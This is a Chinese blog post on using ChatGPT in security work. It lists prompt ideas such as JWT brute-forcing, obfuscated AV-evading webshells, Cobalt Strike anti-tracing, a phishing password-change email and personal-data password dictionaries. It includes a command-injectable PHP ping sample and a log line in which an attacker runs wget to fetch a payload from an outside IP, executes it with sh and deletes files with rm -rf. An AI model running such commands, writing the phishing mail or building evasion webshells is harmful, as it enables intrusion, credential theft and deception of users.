前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >基础入门-ChatGPT&结合安全&融入技术&高效赋能&拓展需求

基础入门-ChatGPT&结合安全&融入技术&高效赋能&拓展需求

作者头像
没事就要多学习
发布2024-07-18 15:18:08
960
发布2024-07-18 15:18:08
举报
文章被收录于专栏:Cyber Security

Chatgpt科普

  1. ChatGPT是什么? ChatGPT–可能很多人被这个缩写的名字搞糊涂了,第一眼无法看出到底什么意思,GPT 的英文原文是 Generative Pre-training Transformer(预训练生成模型),业界有人将 ChatGPT 概括为聊天机器人+搜索工具+文本创造工具的组合,或者简单理解它是一个生成式 AI(内容生成器)。
  2. ChatGPT能做什么? 它的主要功能是协助回答问题、提供信息和生成有关历史、科学、地理等各种主题的信息,这些信息仅限于它所接受的训练,但其知识在不断扩展。
  3. ChatGPT牛在哪里? (1)它是个通用的模型,只要提示词引导,就能快速适应不同领域。 (2)它能理解你的问题,只要给的引导越多,它就能给出你想要的答案。
  4. 安全行业影响: (1)整合多种恶意软件 (2)提升漏洞发现能力 (3)给新手攻击者赋能 (4)便于社会工程学攻击 (5)快速筛选和锁定目标 (6)模拟网络防御攻击技术

利用:

安全开发

1、如何使用Python写一个jwt爆破脚本?

在这里插入图片描述
在这里插入图片描述

2、如何使用Python写一个Webshell检测脚本? 3、如何使用Python写一个MS17010漏洞检测脚本? 4、使用PHP开发一个免杀混淆复杂的webshell脚本 5、在渗透测试靶机中,发现PHP脚本被禁用了敏感函数,如何生成一个绕过的webshell

逆向免杀

1、APK使用什么工具进行反编译?

在这里插入图片描述
在这里插入图片描述

2、常见脱壳工具有那些? 3、免杀中使用什么加壳效果好?

代码审计

1、下面代码会出现哪些安全漏洞?又该如何利用呢?

代码语言:javascript
复制
<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = $_REQUEST[ 'ip' ];

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    $html .= "<pre>{$cmd}</pre>";
}

?>
在这里插入图片描述
在这里插入图片描述

2、Thinkphp历史漏洞有哪些? 3、shiro反序列化漏洞如何利用?

蓝队应急

0、平台项目: 蓝队针对攻击威胁感知平台项目有哪些? 1、日志分析: 103.178.229.152 - - [12/Mar/2023:07:16:02 +0800] “GET /shell?cd+/tmp;rm±rf+*;wget+128.199.134.42/jaws;sh+/tmp/jaws HTTP/1.1” 404 146 “-” “Hello, world”

在这里插入图片描述
在这里插入图片描述

2、流量检测: 写一个检测cobaltstrike payload的脚本 写一个Cobalstrike检测rules规则

APT社工学

1、防溯源:Cobaltstike如何防止被溯源 2、钓鱼邮件:由于系统升级,公司通知员工必须修改自己的密码,请在新业务网站上进行修改,帮我写一份规范的邮件通知 3、字典生成:用户名:xiaodi 电话:13512345678 QQ:471656814 密码组合?

在这里插入图片描述
在这里插入图片描述

其他相关:

网络安全渗透测试简历模版 早知道前几天投简历就用这个了 emmm

在这里插入图片描述
在这里插入图片描述

网络安全渗透测试报告模版

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2023-04-04,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 利用:
    • 安全开发
      • 逆向免杀
        • 代码审计
          • 蓝队应急
            • APT社工学
              • 其他相关:
              相关产品与服务
              网站渗透测试
              网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
              领券
              问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档